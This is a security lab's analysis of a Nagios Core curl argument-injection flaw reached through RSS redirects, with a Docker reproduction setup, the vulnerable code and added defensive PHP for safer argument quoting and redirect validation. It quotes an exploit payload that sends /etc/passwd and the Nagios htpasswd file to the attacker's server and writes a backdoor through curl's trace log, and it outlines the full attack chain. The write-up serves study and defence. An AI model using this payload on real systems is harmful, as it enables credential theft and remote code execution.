CVSS2: 10 High (AV:N/AC:L/Au:N/C:C/I:C/A:C): Access Vector NETWORK, Access Complexity LOW, Authentication NONE, Confidentiality/Integrity/Availability Impact COMPLETE
EPSS: 0.043 Low (percentile 91.3%)
Author: p0wd3r, dawu (Knownsec 404 Security Lab)
Date: 2016-12-15
Nagios is an IT infrastructure monitoring program. Security researcher Dawid Golunski recently found a code execution vulnerability in Nagios Core: the attacker poses as an RSS feed, and when the victim's application fetches RSS data, the attacker returns crafted data to the victim. While processing it, the program injects the malicious data into the curl command line, which leads to code execution.

Impact of the vulnerability: a successful attack executes arbitrary code.
Trigger prerequisite (affected versions): Nagios Core < 4.2.2
Dockerfile:

```dockerfile
FROM quantumobject/docker-nagios
RUN sed -i '99d' /usr/local/nagios/share/includes/rss/rss_fetch.inc
RUN mkdir /tmp/tmp && chown www-data:www-data /tmp/tmp
```

Then run:

```shell
docker run -p 80:80 --name nagios -d quantumobject/docker-nagios
```

Visit http://127.0.0.1/nagios and log in with nagiosadmin:admin.
The vulnerability trigger point is in /usr/local/nagios/share/includes/rss/extlib/Snoopy.class.inc at line 657, in the _httpsrequest function:

```php
// version < 4.2.0
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

// version >= 4.2.0 && version < 4.2.2
exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
```
Here escapeshellcmd is used to process the command parameters. escapeshellcmd does the following:

![Alt text](/Article/UploadPic/2016-12/2016121710513159.png)
The author intended to prevent the execution of multiple commands, but this treatment does not prevent the injection of additional parameters if $URI is controlled; combined with some features of curl, files can then be read and written, which leads to code execution. (In general, escapeshellarg is used to prevent the injection of multiple parameters, but that function is not absolutely secure either; see CVE-2015-4642.)

Because of the earlier CVE-2008-4796, the code was changed in version 4.2.0, but the patch can be bypassed: we only need to close the double quotes before and after our input.
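To make the difference between the two escaping functions concrete, the following PHP is an added illustration and is not code from Nagios, MagpieRSS or the Snoopy library. It assembles the curl command line the way the pre-4.2.0 code does, then the way a hardened builder would (each value quoted as one word with escapeshellarg and curl's "--" end-of-options separator before the URL), and lists the words a POSIX shell would hand to curl in each case. The helper names, the /usr/bin/curl path, the hdr.txt header file name and the -k option are assumptions for the example; the probe URL is the one test.php uses below.

```php
<?php
// Added example (not Nagios, MagpieRSS or Snoopy code): the two ways of
// assembling the curl command line side by side. $curl_path and $headerfile
// stand in for Snoopy's properties of the same name; $cmdline_params is the
// option list Snoopy builds before the request. Names assumed for the example.

function build_with_escapeshellcmd(string $curl_path, string $headerfile, string $cmdline_params, string $uri): string
{
    // Pattern of the pre-4.2.0 code. escapeshellcmd() escapes ; | & ` and the
    // other command separators, but leaves spaces and dashes alone, so the
    // shell still splits the value into several words for curl.
    return $curl_path . " -D \"/tmp/$headerfile\"" . escapeshellcmd($cmdline_params) . ' ' . escapeshellcmd($uri);
}

function build_hardened(string $curl_path, string $headerfile, array $cmdline_params, string $uri): string
{
    // Every value becomes exactly one single-quoted word via escapeshellarg(),
    // and "--" tells curl that whatever follows is a URL, never an option,
    // so a value beginning with "-" cannot be read as a flag either.
    $argv = [$curl_path, '-D', escapeshellarg("/tmp/$headerfile")];
    foreach ($cmdline_params as $param) {
        $argv[] = escapeshellarg($param);
    }
    $argv[] = '--';
    $argv[] = escapeshellarg($uri);
    return implode(' ', $argv);
}

function shell_words(string $cmd): array
{
    // Minimal POSIX-style word splitter (single/double quotes, backslash
    // escapes, whitespace) so the two builders can be compared without
    // executing anything. Not a general shell parser.
    $words = [];
    $cur = null;        // null = currently outside a word
    $quote = null;      // the quote character we are inside, if any
    $len = strlen($cmd);
    for ($i = 0; $i < $len; $i++) {
        $c = $cmd[$i];
        if ($quote !== null) {
            if ($c === $quote) { $quote = null; } else { $cur .= $c; }
            continue;
        }
        if ($c === "'" || $c === '"') { $quote = $c; $cur = (string)$cur; continue; }
        if ($c === '\\' && $i + 1 < $len) { $cur .= $cmd[++$i]; continue; }
        if ($c === ' ' || $c === "\t") {
            if ($cur !== null) { $words[] = $cur; $cur = null; }
            continue;
        }
        $cur .= $c;
    }
    if ($cur !== null) { $words[] = $cur; }
    return $words;
}

// The probe URL used by test.php, which smuggles a "--version" option.
$probe = 'https://www.baidu.com --version';

$loose = build_with_escapeshellcmd('/usr/bin/curl', 'hdr.txt', '', $probe);
$tight = build_hardened('/usr/bin/curl', 'hdr.txt', ['-k'], $probe);

foreach (['escapeshellcmd' => $loose, 'hardened' => $tight] as $label => $cmd) {
    echo $label, ":\n  ", $cmd, "\n";
    // Skip argv[0] (curl itself) and show what curl would receive.
    foreach (array_slice(shell_words($cmd), 1) as $n => $word) {
        echo "    argv[", $n + 1, "] = ", $word, "\n";
    }
}
```

Run it with the php command-line interpreter. In the first listing "--version" appears as an argv entry of its own, exactly the extra parameter the text describes; in the second it stays inside the single URL word, which curl simply fails to fetch. Quoting alone is not a complete fix (the article's pointer to CVE-2015-4642 concerns a flaw in escapeshellarg itself), so the redirect target should also be validated as untrusted input before it reaches any shell.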
Next we check whether $URI is controllable. From the code logic, _httpsrequest is called by the fetch_rss function in /usr/local/nagios/share/includes/rss/rss_fetch.inc, so we create a test file test.php:

```php
<?php
define('MAGPIE_DIR', './includes/rss/');
define('MAGPIE_CACHE_ON', 0);
define('MAGPIE_CACHE_AGE', 0);
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');
require_once(MAGPIE_DIR.'rss_fetch.inc');
fetch_rss('https://www.baidu.com --version');
```
Visit http://127.0.0.1/nagios/test.php with dynamic debugging enabled; with a breakpoint set at the exec function, the call stack is as follows:

![Alt text](/Article/UploadPic/2016-12/2016121710514834.png)

$URI is as follows:

![Alt text](/Article/UploadPic/2016-12/2016121710514411.png)

This shows that $URI is controllable and is not filtered anywhere on the way in.
Next we need to construct the curl parameters that produce the result we want. Here we use the Exp provided by Dawid Golunski. Note that the code he provides targets versions before 4.2.0; to verify versions greater than or equal to 4.2.0 and less than 4.2.2, the following line has to be changed to add the double quotes needed to close the quoting:

```python
self.redirect('https://' + self.request.host + '/nagioshack" -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '"', permanent=False)
```
The Exp works as follows:

1. The attacker opens an HTTP/HTTPS server.
2. The victim uses fetch_rss to send a request to that server.
3. The attacker's server answers the request with a redirect whose URL is https:// + the attacker's server + payload. In the payload, -F sends the contents of files to the server and --trace-ascii writes the traffic log to a file (similar to the -X option of the mail function in the Roundcube RCE).
4. When the server receives the redirected request it performs three operations:
   - it parses the file contents;
   - it returns the backdoor content, which the trace log then writes into the backdoor file;
   - it returns a constructed XML whose description contains <img src=backdoor.php>.
5. The victim parses the XML and outputs the description to HTML, which automatically executes the backdoor.
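Step 3 is where the attacker-controlled value enters: Snoopy follows the redirect and the Location value becomes the $URI handed to _httpsrequest. As an added example (not Snoopy's or MagpieRSS's own code), the PHP below extracts Location from a raw response and refuses to follow it unless it is a plain http/https URL with a hostname made only of hostname characters and no whitespace, quotes or backticks anywhere in the value. The response texts are constructed for the example; the helper names are assumed, and 172.17.0.3 and /nagioshack reuse the article's lab values.

```php
<?php
// Added example, not Snoopy/MagpieRSS code: validate a redirect target before
// it can become the $URI passed to the curl command line.
// Helper names are assumed for the example.

function parse_location_header(string $raw_response): ?string
{
    // Split the head from the body and return the Location value, if any.
    $sections = explode("\r\n\r\n", $raw_response, 2);
    foreach (explode("\r\n", $sections[0]) as $line) {
        if (stripos($line, 'Location:') === 0) {
            return trim(substr($line, strlen('Location:')));
        }
    }
    return null;
}

function is_safe_redirect_target(string $target): bool
{
    // Whitespace, quotes and backticks have no place in a fetched feed URL
    // (a real URL percent-encodes them); they are exactly what turns a value
    // into extra shell words or closes the double quotes added in 4.2.0.
    if (preg_match('/[\s"\'`]/', $target)) {
        return false;
    }
    $parts = parse_url($target);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // A URL whose scheme is http or https cannot begin with "-", so curl
    // will never read it as an option even if quoting were to fail.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Hostname characters only (letters, digits, dot, hyphen); IPv6 literal
    // hosts are deliberately out of scope for this example.
    return (bool)preg_match('/^[A-Za-z0-9.-]+$/', $parts['host']);
}

function next_hop(string $raw_response): ?string
{
    // Returns the URL to follow, or null when the redirect must be dropped.
    $target = parse_location_header($raw_response);
    if ($target === null || !is_safe_redirect_target($target)) {
        return null;
    }
    return $target;
}

// Constructed responses: the first has the shape of the Exp's redirect,
// the second is an ordinary feed relocation.
$malicious = "HTTP/1.1 302 Found\r\n"
    . "Location: https://172.17.0.3/nagioshack\" -Fpasswd=@/etc/passwd --trace-ascii /tmp/tmp/x\r\n"
    . "Content-Length: 0\r\n\r\n";
$benign = "HTTP/1.1 301 Moved Permanently\r\n"
    . "Location: https://feeds.example.net/news.xml\r\n"
    . "Content-Length: 0\r\n\r\n";

foreach (['malicious' => $malicious, 'benign' => $benign] as $label => $response) {
    $hop = next_hop($response);
    echo $label, ': ', $hop === null ? 'redirect dropped' : 'follow ' . $hop, "\n";
}
```

The check runs before any command line exists, so it does not depend on the escaping function at all; a fetcher that applies it at every hop (the initial feed URL and each Location it is asked to follow) never lets a value of the shape shown in step 3 reach exec. Logging the dropped target gives the monitoring team a record of the attempt.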
For easy verification, we create an exp.php in the website directory:

```php
<?php
define('MAGPIE_DIR', './includes/rss/');
define('MAGPIE_CACHE_ON', 0);
define('MAGPIE_CACHE_AGE', 0);
define('MAGPIE_CACHE_DIR', '/tmp/magpie_cache');
require_once(MAGPIE_DIR.'rss_fetch.inc');
fetch_rss('http://172.17.0.3');
```